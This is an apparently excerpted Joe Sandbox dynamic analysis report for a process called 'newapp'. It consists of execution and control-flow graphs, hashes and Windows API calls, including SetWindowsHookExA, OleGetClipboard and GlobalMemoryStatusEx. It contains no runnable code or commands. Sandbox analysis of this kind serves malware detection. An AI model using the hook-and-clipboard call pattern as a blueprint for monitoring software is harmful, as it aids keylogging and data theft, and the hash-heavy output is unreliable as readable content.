                                                                                                                • Opcode ID: 8ca8442763e15a1bef615e28a8a6fd83ff8a477a070f2e47833bccec1551f316
                                                                                                                • Instruction ID: e8ad8441eb0ff29284e636096c334bc7c30ac8030bee749bd4da979966bdc1be
                                                                                                                • Opcode Fuzzy Hash: 8ca8442763e15a1bef615e28a8a6fd83ff8a477a070f2e47833bccec1551f316
                                                                                                                • Instruction Fuzzy Hash: 70519034B102489FDF65EBA8D5806AEB7B2EB84304F208529E406DB355DB35EC42CF91

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:9%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:18
                                                                                                                Total number of Limit Nodes:2
                                                                                                                execution_graph 11195 cbe778 11196 cbe7ba 11195->11196 11197 cbe7c0 GetModuleHandleW 11195->11197 11196->11197 11198 cbe7ed 11197->11198 11199 cb78f0 11200 cb78fb 11199->11200 11202 cb7e38 11199->11202 11203 cb7e5d 11202->11203 11207 cb7f39 11203->11207 11211 cb7f48 11203->11211 11209 cb7f48 11207->11209 11208 cb804c 11208->11208 11209->11208 11215 cb7b5c 11209->11215 11213 cb7f6f 11211->11213 11212 cb804c 11213->11212 11214 cb7b5c CreateActCtxA 11213->11214 11214->11212 11216 cb8fd8 CreateActCtxA 11215->11216 11218 cb909b 11216->11218 11218->11218

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 674 cb8fcc-cb8fd6 675 cb8fd8-cb9099 CreateActCtxA 674->675 677 cb909b-cb90a1 675->677 678 cb90a2-cb90fc 675->678 677->678 685 cb910b-cb910f 678->685 686 cb90fe-cb9101 678->686 687 cb9111-cb911d 685->687 688 cb9120 685->688 686->685 687->688 690 cb9121 688->690 690->690
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00CB9089
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1920267999.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_cb0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: dfd6d2b6a2f404fda93f9d7d148fb3753359c146c6bdffa1520704124a40fadd
                                                                                                                • Instruction ID: 757d5b6d272bcd95c97462c3314f79b8d6e9f81e01febd254c53204cd7d35d1d
                                                                                                                • Opcode Fuzzy Hash: dfd6d2b6a2f404fda93f9d7d148fb3753359c146c6bdffa1520704124a40fadd
                                                                                                                • Instruction Fuzzy Hash: 6741EFB0C00619CFDB24DFA9C844BCEBBB5FF49304F2480AAD408AB255DB766945CF90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 691 cb7b5c-cb9099 CreateActCtxA 694 cb909b-cb90a1 691->694 695 cb90a2-cb90fc 691->695 694->695 702 cb910b-cb910f 695->702 703 cb90fe-cb9101 695->703 704 cb9111-cb911d 702->704 705 cb9120 702->705 703->702 704->705 707 cb9121 705->707 707->707
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 00CB9089
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1920267999.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_cb0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: 5be85217fbc5610150091b828964e845ca284bc518d3b34cf67d2a3f20c832d1
                                                                                                                • Instruction ID: 46b26730f1e2516bf82973bef69956e882724c00404edf191ed22eccd940a230
                                                                                                                • Opcode Fuzzy Hash: 5be85217fbc5610150091b828964e845ca284bc518d3b34cf67d2a3f20c832d1
                                                                                                                • Instruction Fuzzy Hash: 6E41CFB0C00619CFDB24DFA9C944BDEBBB5FF49304F2480AAD508AB255DBB56945CF90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 708 cbe778-cbe7b8 709 cbe7ba-cbe7bd 708->709 710 cbe7c0-cbe7eb GetModuleHandleW 708->710 709->710 711 cbe7ed-cbe7f3 710->711 712 cbe7f4-cbe808 710->712 711->712
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00CBE7DE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1920267999.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_cb0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 63141b5b38d1d696b8e1fcf33be6469ae2fb33699458443ff2e478d7bc541c06
                                                                                                                • Instruction ID: 530bc2e7373047f24b227992ec6fdb01b08b54c89a3da26063bb6c422088f56f
                                                                                                                • Opcode Fuzzy Hash: 63141b5b38d1d696b8e1fcf33be6469ae2fb33699458443ff2e478d7bc541c06
                                                                                                                • Instruction Fuzzy Hash: FF11E0B5C002498FCB10DF9AC444ADEFBF9EB88724F10842AD469B7610D775A645CFA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1919094189.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_80d000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b12a25bd7d73895c22ee0f21697b6d1f121a70dfc2cfb4066846aa8709bda138
                                                                                                                • Instruction ID: 975510929c1b03a973a3dc81480b9f34755f8fb15b10171ac4998c7f720bfda4
                                                                                                                • Opcode Fuzzy Hash: b12a25bd7d73895c22ee0f21697b6d1f121a70dfc2cfb4066846aa8709bda138
                                                                                                                • Instruction Fuzzy Hash: AD21F172504304DFDB45DF94D9C4B2ABF65FB88314F20C569ED098B296C336E816CBA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1919094189.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_80d000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4ab20939d6ebcfc64eeb6f2674660c5ef0696b69e3871eb7f8f896469c08dcbf
                                                                                                                • Instruction ID: facd39657c4bf5ffe42c8276ddc65e17b708cd6f8987063a1c67ad643ff4cfbd
                                                                                                                • Opcode Fuzzy Hash: 4ab20939d6ebcfc64eeb6f2674660c5ef0696b69e3871eb7f8f896469c08dcbf
                                                                                                                • Instruction Fuzzy Hash: 09212571500704DFDB45DF54DDC0B2ABF65FB98324F20C169E9098B296C33AE856CAA6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1919211862.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_81d000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1b33638c7784cd6fa90c17c74f93bae0a73f054ea6bcb8dc7961a00b5eb24ae6
                                                                                                                • Instruction ID: 7fce17a39780fb6e4c547b14ce81c23ec143695ebdcf8b7ad1b53fc6c3b238bd
                                                                                                                • Opcode Fuzzy Hash: 1b33638c7784cd6fa90c17c74f93bae0a73f054ea6bcb8dc7961a00b5eb24ae6
                                                                                                                • Instruction Fuzzy Hash: 1921F275604704DFCB14DF14D984B66BBA9FF88318F20C56DD80A8B296C33AD887CA61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1919094189.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_80d000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                                                                                • Instruction ID: d50f367ed5cf800c1c2369ab0034fd7f7ef953cfe2864769c1efc5dfee55a68f
                                                                                                                • Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                                                                                                • Instruction Fuzzy Hash: 4021CD76404340CFDB06CF40D9C4B16BF62FB84314F24C1A9DC084B296C33AE82ACBA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1919094189.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_80d000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                • Instruction ID: 6464992856edaf1fd88e15045f0b0cc746f64849fe98e0a36d716c34314f5640
                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                • Instruction Fuzzy Hash: F611E172504740CFDB02CF44D9C4B16BF71FB94324F24C2A9D8094B256C33AE85ACBA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1919211862.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_81d000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction ID: 5ca955f26ff2b2f29947720c0d0acf2e92f9108e09f49933cc708b914cbd1f47
                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction Fuzzy Hash: A811BB75504780CFCB11CF14D5C4B56BBA2FB88314F24C6AAD8098B656C33AD88ACBA2

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:14.8%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:159
                                                                                                                Total number of Limit Nodes:18
                                                                                                                execution_graph 38026 67e6758 38027 67e67c0 CreateWindowExW 38026->38027 38029 67e687c 38027->38029 38033 67edea8 38034 67edeec SetWindowsHookExA 38033->38034 38036 67edf32 38034->38036 38037 67e56a8 38038 67e56ae GetModuleHandleW 38037->38038 38040 67e5725 38038->38040 38041 67ea2a8 38042 67ea2ae GetCurrentProcess 38041->38042 38044 67ea339 38042->38044 38045 67ea340 GetCurrentThread 38042->38045 38044->38045 38046 67ea37d GetCurrentProcess 38045->38046 38047 67ea376 38045->38047 38048 67ea3b3 38046->38048 38047->38046 38049 67ea3db GetCurrentThreadId 38048->38049 38050 67ea40c 38049->38050 38051 67eb87c 38050->38051 38052 67eb7d2 38050->38052 38056 67e4134 38051->38056 38054 67eb82a CallWindowProcW 38052->38054 38055 67eb7d9 38052->38055 38054->38055 38057 67e413f 38056->38057 38058 67eb161 38057->38058 38060 67eb151 38057->38060 38072 67ea274 38058->38072 38064 67eb650 38060->38064 38068 67eb690 38060->38068 38061 67eb15f 38061->38061 38065 67eb655 38064->38065 38066 67ea274 CallWindowProcW 38065->38066 38067 67eb77a 38065->38067 38066->38065 38067->38061 38070 67eb696 38068->38070 38069 67ea274 CallWindowProcW 38069->38070 38070->38069 38071 67eb77a 38070->38071 38071->38061 38073 67ea27a 38072->38073 38074 67eb82a CallWindowProcW 38073->38074 38075 67eb7d9 38073->38075 38074->38075 38075->38061 38076 67ebf48 38077 67ebf4e 38076->38077 38078 67ebf63 38077->38078 38080 67eb4ec 38077->38080 38081 67ebf98 OleInitialize 38080->38081 38083 67ebffc 38081->38083 38083->38078 38084 2920848 38085 292084e 38084->38085 38086 292091b 38085->38086 38088 2921340 38085->38088 38090 2921356 38088->38090 38089 2921454 38089->38085 38090->38089 38094 29280f9 38090->38094 38099 67e3ac8 38090->38099 38105 67e3ab8 38090->38105 38095 2928103 38094->38095 38096 29281b9 38095->38096 38111 67ffa60 38095->38111 38115 67ffa50 38095->38115 38096->38090 38100 67e3ada 38099->38100 38103 67e3b8b 38100->38103 38119 67e3824 38100->38119 38102 67e3b51 38124 67e3844 38102->38124 38103->38090 38106 67e3abc 38105->38106 38107 67e3824 GetModuleHandleW 38106->38107 38109 67e3b8b 38106->38109 38108 67e3b51 38107->38108 38110 67e3844 KiUserCallbackDispatcher 38108->38110 38109->38090 38110->38109 38113 67ffa75 38111->38113 38112 67ffc8a 38112->38096 38113->38112 38114 67ffca0 GlobalMemoryStatusEx GlobalMemoryStatusEx 38113->38114 38114->38113 38117 67ffa54 38115->38117 38116 67ffc8a 38116->38096 38117->38116 38118 67ffca0 GlobalMemoryStatusEx GlobalMemoryStatusEx 38117->38118 38118->38117 38120 67e382f 38119->38120 38128 67e4c6b 38120->38128 38134 67e4c80 38120->38134 38121 67e3d2a 38121->38102 38125 67e384f 38124->38125 38127 67ebabb 38125->38127 38170 67eb2b4 38125->38170 38127->38103 38129 67e4c80 38128->38129 38140 67e51d0 38129->38140 38132 67e4d5a 38135 67e4cab 38134->38135 38139 67e51d0 GetModuleHandleW 38135->38139 38136 67e4d2e 38137 67e3ffc GetModuleHandleW 38136->38137 38138 67e4d5a 38136->38138 38137->38138 38139->38136 38141 67e4d2e 38140->38141 38142 67e51e6 38140->38142 38141->38132 38146 67e3ffc 38141->38146 38143 67e52ae 38142->38143 38150 67e536a 38142->38150 38160 67e5370 38142->38160 38147 67e56b0 GetModuleHandleW 38146->38147 38149 67e5725 38147->38149 38149->38132 38151 67e5370 38150->38151 38152 67e3ffc GetModuleHandleW 38151->38152 38153 67e53a9 38151->38153 38152->38153 38154 67e3ffc GetModuleHandleW 38153->38154 38159 67e5574 38153->38159 38155 67e54fa 38154->38155 38156 67e3ffc GetModuleHandleW 38155->38156 38155->38159 38157 67e5548 38156->38157 38158 67e3ffc GetModuleHandleW 38157->38158 38157->38159 38158->38159 38159->38143 38161 67e5376 38160->38161 38162 67e3ffc GetModuleHandleW 38161->38162 38163 67e53a9 38161->38163 38162->38163 38164 67e3ffc GetModuleHandleW 38163->38164 38169 67e5574 38163->38169 38165 67e54fa 38164->38165 38166 67e3ffc GetModuleHandleW 38165->38166 38165->38169 38167 67e5548 38166->38167 38168 67e3ffc GetModuleHandleW 38167->38168 38167->38169 38168->38169 38169->38143 38171 67ebad0 KiUserCallbackDispatcher 38170->38171 38173 67ebb3e 38171->38173 38173->38125 38030 67ea4f0 38031 67ea4f6 DuplicateHandle 38030->38031 38032 67ea586 38031->38032 38174 67ec0e0 38175 67ec0e6 OleGetClipboard 38174->38175 38177 67ec17a 38175->38177 38178 10ed030 38179 10ed048 38178->38179 38180 10ed0a2 38179->38180 38182 67e4134 CallWindowProcW 38179->38182 38187 67e690a 38179->38187 38193 67eb0d1 38179->38193 38202 67e6a30 38179->38202 38206 67e6910 38179->38206 38212 67e4124 38179->38212 38182->38180 38192 67e6936 38187->38192 38188 67e4124 GetModuleHandleW 38189 67e6942 38188->38189 38190 67e4134 CallWindowProcW 38189->38190 38191 67e6957 38190->38191 38191->38180 38192->38188 38194 67eb0da 38193->38194 38195 67eb0ea 38193->38195 38194->38180 38196 67eb161 38195->38196 38198 67eb151 38195->38198 38197 67ea274 CallWindowProcW 38196->38197 38199 67eb15f 38197->38199 38200 67eb650 CallWindowProcW 38198->38200 38201 67eb690 CallWindowProcW 38198->38201 38200->38199 38201->38199 38203 67e6a40 38202->38203 38216 67e415c 38203->38216 38205 67e6a47 38205->38180 38211 67e6936 38206->38211 38207 67e4124 GetModuleHandleW 38208 67e6942 38207->38208 38209 67e4134 CallWindowProcW 38208->38209 38210 67e6957 38209->38210 38210->38180 38211->38207 38213 67e412f 38212->38213 38214 67e415c GetModuleHandleW 38213->38214 38215 67e6a47 38214->38215 38215->38180 38217 67e4167 38216->38217 38218 67e3ffc GetModuleHandleW 38217->38218 38219 67e6b17 38217->38219 38218->38219

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 124 67f3570-67f3591 125 67f3593-67f3596 124->125 126 67f35bc-67f35bf 125->126 127 67f3598-67f35b7 125->127 128 67f35c5-67f35e4 126->128 129 67f3d60-67f3d62 126->129 127->126 137 67f35fd-67f3607 128->137 138 67f35e6-67f35e9 128->138 130 67f3d69-67f3d6c 129->130 131 67f3d64 129->131 130->125 134 67f3d72-67f3d7b 130->134 131->130 142 67f360d-67f361e call 67f315c 137->142 138->137 139 67f35eb-67f35fb 138->139 139->142 144 67f3623-67f3628 142->144 145 67f362a-67f3630 144->145 146 67f3635-67f3912 144->146 145->134 167 67f3918-67f39c7 146->167 168 67f3d52-67f3d5f 146->168 177 67f39c9-67f39ee 167->177 178 67f39f0 167->178 180 67f39f9-67f3a0c call 67f3168 177->180 178->180 183 67f3d39-67f3d45 180->183 184 67f3a12-67f3a34 call 67f3174 180->184 183->167 185 67f3d4b 183->185 184->183 188 67f3a3a-67f3a44 184->188 185->168 188->183 189 67f3a4a-67f3a55 188->189 189->183 190 67f3a5b-67f3b31 189->190 202 67f3b3f-67f3b6f 190->202 203 67f3b33-67f3b35 190->203 207 67f3b7d-67f3b89 202->207 208 67f3b71-67f3b73 202->208 203->202 209 67f3b8b-67f3b8f 207->209 210 67f3be9-67f3bed 207->210 208->207 209->210 213 67f3b91-67f3bbb 209->213 211 67f3d2a-67f3d33 210->211 212 67f3bf3-67f3c2f 210->212 211->183 211->190 224 67f3c3d-67f3c4b 212->224 225 67f3c31-67f3c33 212->225 220 67f3bbd-67f3bbf 213->220 221 67f3bc9-67f3be6 call 67f3180 213->221 220->221 221->210 228 67f3c4d-67f3c58 224->228 229 67f3c62-67f3c6d 224->229 225->224 228->229 232 67f3c5a 228->232 233 67f3c6f-67f3c75 229->233 234 67f3c85-67f3c96 229->234 232->229 235 67f3c79-67f3c7b 233->235 236 67f3c77 233->236 238 67f3cae-67f3cba 234->238 239 67f3c98-67f3c9e 234->239 235->234 236->234 243 67f3cbc-67f3cc2 238->243 244 67f3cd2-67f3d23 238->244 240 67f3ca2-67f3ca4 239->240 241 67f3ca0 239->241 240->238 241->238 245 67f3cc6-67f3cc8 243->245 246 67f3cc4 243->246 244->211 245->244 246->244
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2392861976
                                                                                                                • Opcode ID: c8aed5be8e0ad614e02069d974afb2d4f9e0c42176a005e7f7569ca710fdf950
                                                                                                                • Instruction ID: 049bc4ba0a0fab11ce817f1590fc3225068e09c33cbfc2437e9f55fd79c074fd
                                                                                                                • Opcode Fuzzy Hash: c8aed5be8e0ad614e02069d974afb2d4f9e0c42176a005e7f7569ca710fdf950
                                                                                                                • Instruction Fuzzy Hash: 77324030E1071ACFCB54EF75D8549ADB7B2BFC9310F50C669D509AB264EB309985CB81

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 927 67f7e68-67f7e86 928 67f7e88-67f7e8b 927->928 929 67f7e8d-67f7ea7 928->929 930 67f7eac-67f7eaf 928->930 929->930 931 67f7ed2-67f7ed5 930->931 932 67f7eb1-67f7ecd 930->932 934 67f7ed7-67f7ee1 931->934 935 67f7ee2-67f7ee5 931->935 932->931 936 67f7efc-67f7efe 935->936 937 67f7ee7-67f7ef5 935->937 939 67f7f05-67f7f08 936->939 940 67f7f00 936->940 943 67f7f0e-67f7f24 937->943 945 67f7ef7 937->945 939->928 939->943 940->939 947 67f813f-67f8149 943->947 948 67f7f2a-67f7f33 943->948 945->936 949 67f814a-67f8156 948->949 950 67f7f39-67f7f56 948->950 953 67f815e-67f8161 949->953 954 67f8158 949->954 959 67f812c-67f8139 950->959 960 67f7f5c-67f7f84 950->960 957 67f8162-67f817f 953->957 955 67f81af-67f81bc 954->955 956 67f815a 954->956 963 67f81c7-67f81c9 955->963 956->957 961 67f815c 956->961 962 67f8181-67f8184 957->962 959->947 959->948 960->959 981 67f7f8a-67f7f93 960->981 961->953 964 67f81a7-67f81aa 962->964 965 67f8186-67f81a2 962->965 966 67f81cb-67f81d1 963->966 967 67f81e1-67f81e5 963->967 964->955 969 67f8257-67f825a 964->969 965->964 970 67f81d5-67f81d7 966->970 971 67f81d3 966->971 974 67f81e7-67f81f1 967->974 975 67f81f3 967->975 972 67f848f-67f8491 969->972 973 67f8260-67f826f 969->973 970->967 971->967 978 67f8498-67f849b 972->978 979 67f8493 972->979 988 67f828e-67f82d2 973->988 989 67f8271-67f828c 973->989 980 67f81f8-67f81fa 974->980 975->980 978->962 983 67f84a1-67f84aa 978->983 979->978 984 67f81fc-67f81ff 980->984 985 67f8211-67f824a 980->985 981->949 987 67f7f99-67f7fb5 981->987 984->983 985->973 1009 67f824c-67f8256 985->1009 996 67f7fbb-67f7fe5 987->996 997 67f811a-67f8126 987->997 994 67f82d8-67f82e9 988->994 995 67f8463-67f8479 988->995 989->988 1004 67f82ef-67f830c 994->1004 1005 67f844e-67f845d 994->1005 995->972 1013 67f7feb-67f8013 996->1013 1014 67f8110-67f8115 996->1014 997->959 997->981 1004->1005 1016 67f8312-67f8408 call 67f6690 1004->1016 1005->994 1005->995 1013->1014 1021 67f8019-67f8047 1013->1021 1014->997 1065 67f840a-67f8414 1016->1065 1066 67f8416 1016->1066 1021->1014 1027 67f804d-67f8056 1021->1027 1027->1014 1029 67f805c-67f808e 1027->1029 1036 67f8099-67f80b5 1029->1036 1037 67f8090-67f8094 1029->1037 1036->997 1039 67f80b7-67f810e call 67f6690 1036->1039 1037->1014 1038 67f8096 1037->1038 1038->1036 1039->997 1067 67f841b-67f841d 1065->1067 1066->1067 1067->1005 1068 67f841f-67f8424 1067->1068 1069 67f8426-67f8430 1068->1069 1070 67f8432 1068->1070 1071 67f8437-67f8439 1069->1071 1070->1071 1071->1005 1072 67f843b-67f8447 1071->1072 1072->1005
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q
                                                                                                                • API String ID: 0-355816377
                                                                                                                • Opcode ID: 47be0fa7156a4fcecf961037287d30765e155e5bc8eb3827dfe167c528945565
                                                                                                                • Instruction ID: c0a18ef821d98e3040ebb1562cd073fab38ad1d84618ac5622ddd5b6ebf6af96
                                                                                                                • Opcode Fuzzy Hash: 47be0fa7156a4fcecf961037287d30765e155e5bc8eb3827dfe167c528945565
                                                                                                                • Instruction Fuzzy Hash: ED028B30B102068FDB54DF68D990AAEB7F6FF84314F248529D5169B395DB31EC86CB82
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 3d5ba69c94ea50cedb996338fa624e45e300f633c4dc85e0ffb368e8e9cd73a1
                                                                                                                • Instruction ID: 4b04c889e8c5e1c4f1c8c3944f2d4b82e76709f96fa97a7afe2991fa1aa47547
                                                                                                                • Opcode Fuzzy Hash: 3d5ba69c94ea50cedb996338fa624e45e300f633c4dc85e0ffb368e8e9cd73a1
                                                                                                                • Instruction Fuzzy Hash: F0C1CE70A007098FDB44EF79C89056EBBF2FF89314B108969C44ADB355EB75E84ACB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9233e19a47dd5e756f3fe9ea74ba0b2a805dbc48ead8d548aba7d23a9da047d9
                                                                                                                • Instruction ID: ce938f9f481809105abb79cba065b49c81aceeaa90bf3392ed40c831196d092b
                                                                                                                • Opcode Fuzzy Hash: 9233e19a47dd5e756f3fe9ea74ba0b2a805dbc48ead8d548aba7d23a9da047d9
                                                                                                                • Instruction Fuzzy Hash: C462BD34B202048FDB54DB68D594AADBBF2FF84314F248569E60AEB354DB31EC46CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c74991edc51183181e6bc5ee5790dd598a0c8777d75d1bff042c78f3002b1399
                                                                                                                • Instruction ID: 96b53b5603be879bfcc95660ae0b9b632b836a879faf4e9dcefbcefa5ee62072
                                                                                                                • Opcode Fuzzy Hash: c74991edc51183181e6bc5ee5790dd598a0c8777d75d1bff042c78f3002b1399
                                                                                                                • Instruction Fuzzy Hash: 21328130B102099FDF55EB68D580BBEB7B2EB88314F148529E605DB355DB31EC868B91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 57a9d1d4f6c6f59443ef9ac067f0977cba667284359453cc44c1ca5826f7ca65
                                                                                                                • Instruction ID: f224ad5fac402c749ce14c3e296f6ae13e918ec1d4d13805c2b67fca309d1cf1
                                                                                                                • Opcode Fuzzy Hash: 57a9d1d4f6c6f59443ef9ac067f0977cba667284359453cc44c1ca5826f7ca65
                                                                                                                • Instruction Fuzzy Hash: E8220571F202058FEF64DB64D884ABEBBB2FB95320F248425EA59DB345DA30DC41CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f5e7b179a70bf281c76404f1d326fa27bed189603eb7ab743d8ac0d29b74f33d
                                                                                                                • Instruction ID: fb44942b7475d8b827890b3925c454f57ad0cbad5909294b087db3abca603643
                                                                                                                • Opcode Fuzzy Hash: f5e7b179a70bf281c76404f1d326fa27bed189603eb7ab743d8ac0d29b74f33d
                                                                                                                • Instruction Fuzzy Hash: EC229270E202098FDF64DB68C580BBDB7B6FB89710F648826E509DB395DA35DC81CB91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
